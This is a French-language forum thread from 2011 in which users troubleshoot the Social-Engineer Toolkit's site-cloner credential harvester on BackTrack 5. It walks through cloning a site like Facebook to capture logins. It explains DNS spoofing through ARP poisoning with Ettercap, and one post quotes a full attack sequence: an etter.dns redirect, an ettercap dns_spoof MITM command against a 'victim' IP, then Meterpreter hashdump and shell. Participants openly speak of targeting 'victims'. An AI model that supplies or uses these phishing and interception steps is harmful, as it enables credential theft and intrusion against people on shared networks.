Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 05-06-2011 17:08:33

moul
Membre
Inscription : 02-06-2011
Messages : 20

Site cloner sur Backtrack 5 probleme ?

Bonjour a tous ,

Voici mon probleme :

Quand je créé une fake page ( le site cloner) en faisant :

SET / Website attack vectors / credential harvester attack method / Site cloner / http://www.monsite.com yikes

je suis le seul a pouvoir voir cette page ....

Comment puis-je faire pour que le site cloner soit accessible a tout le monde ???



Merci et bonne soirée !

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-06-2011 18:25:47

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Site cloner sur Backtrack 5 probleme ?

Je ne connais pas bien SET, mais cette page est très certainement clonée localement, donc ça me paraît normal que tu sois le seul à y avoir accès smile

Après, ça dépend de ce que tu appelles "tout le monde". Si c'est au sens premier du terme (= n'importe qui sur la planète) ça va se compliquer un peu parce qu'il te faut un DNS qui redirige le nom de domaine vers ta machine, un serveur sur ladite machine qui supporte la charge,... tout ça a un coût qui dépasse sans doute ce que tu es prêt à investir pour un essai smile

Si tu parles des autres personnes sur le LAN, commence par vérifier s'ils savent y accéder en tapant l'adresse IP de ta machine dans leur navigateur. Si ça foire déjà là, il faut revoir la partie serveur web (vérifier qu'Apache est lançé, etc...).
S'ils savent y accéder par l'IP et que tu veux qu'ils y accèdent par un nom de domaine, tu dois te lancer dans l'empoisonnement DNS : quand quelqu'un demandera "c'est quoi l'adresse IP de google.fr ?" (par exemple) ton système répondra + rapidement que le serveur DNS légitime et un utilisateur qui irait sur google.fr se retrouverait sur ta fausse page.

Pour plus de détails, cherche du côté de dnsspoof (y a un programme indépendant, ou un module Ettercap pour ça). Dans tous les cas, tu devras sans doute passer par un empoisonnement ARP donc profites-en pour revoir les bases smile

Hors Ligne

#3 05-06-2011 23:07:37

moul
Membre
Inscription : 02-06-2011
Messages : 20

Re : Site cloner sur Backtrack 5 probleme ?

Ok Ok x)

Hors Ligne

#4 07-06-2011 23:24:00

Ronaldo17
Membre Radioactif
Inscription : 07-11-2010
Messages : 86

Re : Site cloner sur Backtrack 5 probleme ?

moul peut tu-expliquer rapidement comment utiliser cette methode ?

Merci^^

Hors Ligne

#5 08-06-2011 13:21:35

moul
Membre
Inscription : 02-06-2011
Messages : 20

Re : Site cloner sur Backtrack 5 probleme ?

Antares je n'ai vu nul par qu'il faudrait que j'achete du materiel informatique pour pouvoir utiliser SET o_O"

Tu ouvre une konsole tu tape
cd /pentest/exploits/set
./set
2 ( Website attack vectors )
3 ( credential harvester attack method )
2 ( site cloner )
http://www.LeSiteQueTuVeuxCloner.fr ( exemple : http://www.facebook.com )
ensuite tu attend un peu ...

ton site cloner est sur ton adresse ip ( donc tape ifconfig dans une konsole pour la voir ! )

Voilou !

Antares mon Apache ne fonctionne pas je pense , comment faire pour qu'il se run ?

Hors Ligne

#6 08-06-2011 13:26:37

moul
Membre
Inscription : 02-06-2011
Messages : 20

Re : Site cloner sur Backtrack 5 probleme ?

Heu oui en effet personne sur le reseau ( meme pas moi ) peu voir mon site cloner :'(

Je suis sous backtrack 5 kde 32

Hors Ligne

#7 08-06-2011 14:56:42

Ronaldo17
Membre Radioactif
Inscription : 07-11-2010
Messages : 86

Re : Site cloner sur Backtrack 5 probleme ?

dans backtrack 5 start apache.

Hors Ligne

#8 08-06-2011 15:39:56

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Site cloner sur Backtrack 5 probleme ?

moul a écrit :

Antares mon Apache ne fonctionne pas je pense , comment faire pour qu'il se run ?

Pour démarrer apache c'est pas compliqué tu vas dans le menu principal de Backtrack et tu vas dans "services", tu auras une option start apache.

Sinon tu peux également le lancer en ligne de commande je te donne un lien complet sur apache ça peut te servir.

Doc apache


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#9 08-06-2011 16:01:11

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Site cloner sur Backtrack 5 probleme ?

Antares je n'ai vu nul par qu'il faudrait que j'achete du materiel informatique pour pouvoir utiliser SET o_O"

Mais je n'ai jamais dit nulle part que tu devrais acheter du matos non plus wink Ma remarque était ironique en disant que si tu voulais donner accès au monde entier à ton site cloné, il te faudrait du matériel pro'. Mais je suppose que ce n'est pas le cas, donc pour "diffuser" ce site web localement tu as juste besoin d'un ordi smile

Pour démarrer Apache, Noireaude t'a donné la manip'. Par contre, je ne suis pas sûr que SET stocke ses fichiers directement au bon endroit pour qu'Apache puisse les servir, je vérifierai ça ce soir si j'ai le temps (c'est pas gagné ça par contre hmm).

Essaie déjà de lancer Apache et de voir si les autres ordis du réseau peuvent voir le site en tapant l'adresse IP de ta machine.

Hors Ligne

#10 08-06-2011 17:08:06

moul
Membre
Inscription : 02-06-2011
Messages : 20

Re : Site cloner sur Backtrack 5 probleme ?

Mon apache veut pas se mettre en route xDDD
il me dit :

" apache2: could not reliably determine the server's fully qualified domain name , using 127.0.0.1 for ServerName
httpd (pid 11650) already running "

quand je fais apache start ... :'(

Maintenant je peux plus faire de site cloner , SET m'informe directement que mon apache ne run pas ^^ ( pourquoi sa marchait avant , hum i don't no xD )

Thx

Hors Ligne

#11 08-06-2011 17:12:29

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Site cloner sur Backtrack 5 probleme ?

Je pense au contraire qu'il est lancé le bougre.
Tu peux vérifier en console via un ps -e -f si le processus est lancé ou via un ping éventuellement non?

Ne dois tu pas indiquer un port spécifique à SET pour pouvoir te loguer comme avec xplico ? ex 127.0.0.1:mon_port


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#12 08-06-2011 17:22:50

moul
Membre
Inscription : 02-06-2011
Messages : 20

Re : Site cloner sur Backtrack 5 probleme ?

Oui ( je suis pas bilingue xD ) enfait mon apache est bel et bien lancé !!!

Je l'ai stoper et sa marche ... mais toujours que sur ma console virtuel en non sur un autre ordi du reseau ! :'(

Et s'il fau donner un port a set je ne sais absolument pas comment faire :'(

Hors Ligne

#13 08-06-2011 17:34:37

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Site cloner sur Backtrack 5 probleme ?

moul a écrit :

Et s'il fau donner un port a set je ne sais absolument pas comment faire :'(

Commence déjà par chercher une doc sur le sujet ou un manuel, cela doit bien être indiqué quelque part, je ne peut pas t'en dire n'utilisant pas ce logiciel.


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#14 09-06-2011 11:09:55

moul
Membre
Inscription : 02-06-2011
Messages : 20

Re : Site cloner sur Backtrack 5 probleme ?

Je n'ai vu sur aucun forum/doc comme quoi il fallait run apache !!! >.<"
Aucun ne parle d'apache , etes-vous sur de vous ???

Sur aucune video de tuto lié a SET , meme celles qui font tout de A a Z personne ne touche au server apache ... Hum je suis pommé !

Hors Ligne

#15 09-06-2011 11:45:26

algerino
Membre d'Or
Inscription : 12-02-2010
Messages : 409

Re : Site cloner sur Backtrack 5 probleme ?

moul à ecrit :

Sur aucune vidéo de tuto lié a SET , meme celles qui font tout de A a Z personne ne touche au server apache ... Hum je suis pommé !

Normal que dans la vidéo, il utilise pas Apache, ton but est que tout le monde ai accès à ta page cloné donc comme le dit Antares il faudra que tu ai ton propre serveur  DNS qui redirige le nom de domaine vers ta machine, un serveur sur ladite machine qui supporte la charge.
Donc concernant Apache, il te sera utile pour une utilisation seulement local !


Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

Hors Ligne

#16 10-06-2011 14:18:47

moul
Membre
Inscription : 02-06-2011
Messages : 20

Re : Site cloner sur Backtrack 5 probleme ?

Donc comment je peux avoir mon propre server DNS ??? sa j'ai pas trouvé d'explication le concernant sur SET :'(

Comment faire ???

Hors Ligne

#17 10-06-2011 15:27:51

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Site cloner sur Backtrack 5 probleme ?

Bon, on va repartir calmement.

1) Je viens de faire l'essai avec SET (un programme que je n'ai presque jamais utilisé, au passage), sur une BT5 "vierge", exactement la procédure que tu décris ci-dessus : ça marche sans problème. Une fois que le site a été cloné, il se met en attente de credentials et je peux accéder au faux site à partir de n'importe quel ordi de mon LAN (en tapant http://192.168.1.42, en mettant l'adresse IP de la machine évidemment).
=> Si déjà tu as un problème là, il va falloir détailler parce que j'ai l'impression que tout roule jusqu'ici

2) Oublie Apache, SET a son propre serveur web en python pour servir les pages. Pas besoin d'Apache, ni de le lancer, ni de le couper.

3) Le DNS, c'est uniquement si tu veux que tes "victimes" puissent arriver sur ton site en tapant une adresse plutôt que l'IP de ta machine. C'est une attaque un peu technique à faire, qui s'appelle (comme je l'ai déjà précisé) le DNS Spoof. Une petite recherche te permettra d'en savoir +, mais en gros tu dois te mettre en MITM et intercepter les requêtes DNS pour y répondre avant le "vrai" DNS.
Soit tu fais ça via Ettercap, soit tu lances arpspoof et dnsspoof séparément.

Au vu de tout ceci, est-ce que tu peux réexpliquer clairement où se situe le problème, si problème il y a ? smile

Hors Ligne

#18 10-06-2011 21:03:48

Ronaldo17
Membre Radioactif
Inscription : 07-11-2010
Messages : 86

Re : Site cloner sur Backtrack 5 probleme ?

moul envoie moi un message en privé,c ar je veut aussi me mettre à travailler sur set... On pourra coordonnée nos recherche. Car l'union fais la force, et ainsi mieux faire partager la communauté de crack wifi.

Merci

Hors Ligne

#19 13-06-2011 12:57:04

moul
Membre
Inscription : 02-06-2011
Messages : 20

Re : Site cloner sur Backtrack 5 probleme ?

" I know SET has Ettercap integrated in it but it didn’t work till today when ReL1K fixed it !!!!

Here are the commands used:

[email protected]:-# cd /pentest/exploits/SET
[email protected]:-# nano config/set_config
[email protected]:-# ./set
(SET SETUP)…

[email protected]:-# nano /usr/share/ettercap/etter.dns

www.youtube.com A 192.168.1.64

[email protected]:-# ettercap -T -i wlan0 -q -P dns_spoof -M ARP /192.168.1.254/ /192.168.1.67/

msf> sessions -l
msf> sessions -i 1
meterpreter> use priv
meterpreter> hashdump
meterpreter> shell

C:\Documents and Settings\UFO\Desktop> ipconfig

192.168.1.254 = Default GW
192.168.1.67 = Victim
192.168.1.64 = Attacker.

Hope you enjoy it! "

C'est actement se qu'il me faut !!! Mon seul probleme c'est que je sais pas si j'ai un " wlan0 " , je n'ai qu'un eth0 et a la ligne suivante :

[email protected]:-# ettercap -T -i wlan0 -q -P dns_spoof -M ARP /192.168.1.254/ /192.168.1.67/

il ya a un wlan0

Donc au lieu de s'effectué normalement j'ai le droit a :

"Listening on wlan0...
ERROR : 19 , no such device
[ec_capture.c:caputure_init:146]
pcap_open: SIOCGIFHWADDR : No such device "

C'est a la fin de la video ...

Si quelqun a une solution :p ( en remplacant pas eth0 sa ne marche pas sniiif ).


Merci d'avance , cordialement Moul big_smile

Dernière modification par moul (13-06-2011 12:58:32)

Hors Ligne

#20 13-06-2011 13:11:19

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Site cloner sur Backtrack 5 probleme ?

Tu serais pas en machine virtuelle, toi des fois ? Je rappelle que les VM ne supportent pas les cartes WiFi internes, donc dans ce cas-là c'est normal que tu n'aies pas de wlan0. regarde dans [c]iwconfig[/c] si tu as une interface WiFi reconnue (peut-être sous un autre nom : ra0,...) et utilise celle-là.

S'il n'y a rien dans iwconfig (et que tu n'es pas en machine virtuelle), ça vaut dire qu'aucune carte WiFi n'est reconnue par le système et c'est un problème de compatibilité matérielle. Ce n'est pas le sujet ici, donc merci d'ouvrir un nouveau topic si tu veux parler de ça wink

Hors Ligne

#21 13-06-2011 23:10:59

moul
Membre
Inscription : 02-06-2011
Messages : 20

Re : Site cloner sur Backtrack 5 probleme ?

Oui je suis en machine virtuelle !!!

dans iwconfig j'ai " lo et eth0 .... je prend quoi ?

Et qu'es que le 192.168.1.254? Nous avons tous le meme ?

Merci pour tes reponses Antares x)

Dernière modification par moul (13-06-2011 23:13:29)

Hors Ligne

#22 14-06-2011 00:18:20

Ronaldo17
Membre Radioactif
Inscription : 07-11-2010
Messages : 86

Re : Site cloner sur Backtrack 5 probleme ?

le 192.168.1.254 est une adresse ip privé sa dépend des personnes tu peut modifier dans les paramètres de ta carte en attribuant soit une ip fixe soit laisser ton serveur DHCP t'attribué automatiquement une ip. et si tu as seulement lo et eth0 ta carte wifi n'est pas reconnue sinon tu aurais wlan0. Le principe d'une VM est de virtualisé ton matériel. Donc ta carte wifi ne peut être reconnue. Donc soit tu te met en live-cd et espérer que ta carte wifi soit compatible backtrack, soit tu achete une clé wifi externe.

Hors Ligne

#23 14-06-2011 20:16:02

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Site cloner sur Backtrack 5 probleme ?

Attends moul, t'es en train de me dire que depuis le début tu es en machine virtuelle ?? Et tu te demandes encore pourquoi ça ne marche pas ??
smiley_bang-1d2d622.gif

*Soupir*
Par défaut, une machine virtuelle n'existe pas en dehors de son hôte physique, donc il n'est pas possible d'y accéder depuis les autres machines du LAN. De plus, les machines virtuelles ne prennent pas en charge les cartes WiFi internes (on arrête pas de le répéter !). Donc je le répète : normal que tu n'aies pas de wlan0.

Tant que tu es en machine virtuelle, tu ne pourras pas utiliser SET correctement donc ça va être la maxi-prise de tête. Normal que tu n'arrives à rien roll
Si tu veux appliquer ce qui est montré dans la vidéo, passe en mode Live (en bootant sur un DVD ou une clé USB), là au moins tu auras accès au LAN et à ton interface WiFi...

Hors Ligne

#24 16-06-2011 22:59:17

moul
Membre
Inscription : 02-06-2011
Messages : 20

Re : Site cloner sur Backtrack 5 probleme ?

Ok ok x) encore merci !!!

Hors Ligne

#25 16-06-2011 23:45:56

Ronaldo17
Membre Radioactif
Inscription : 07-11-2010
Messages : 86

Re : Site cloner sur Backtrack 5 probleme ?

alors moul ta réussi maintenant ou pas ?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 55 Hier 18:55:55 par pwerrick
3 222 21-11-2016 09:43:17 par MiscL
Problème reaver par Antho3674
4 296 15-11-2016 22:05:12 par kcdtv
3 332 14-08-2016 10:22:07 par MiscL
5 727 18-07-2016 23:13:58 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.041 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]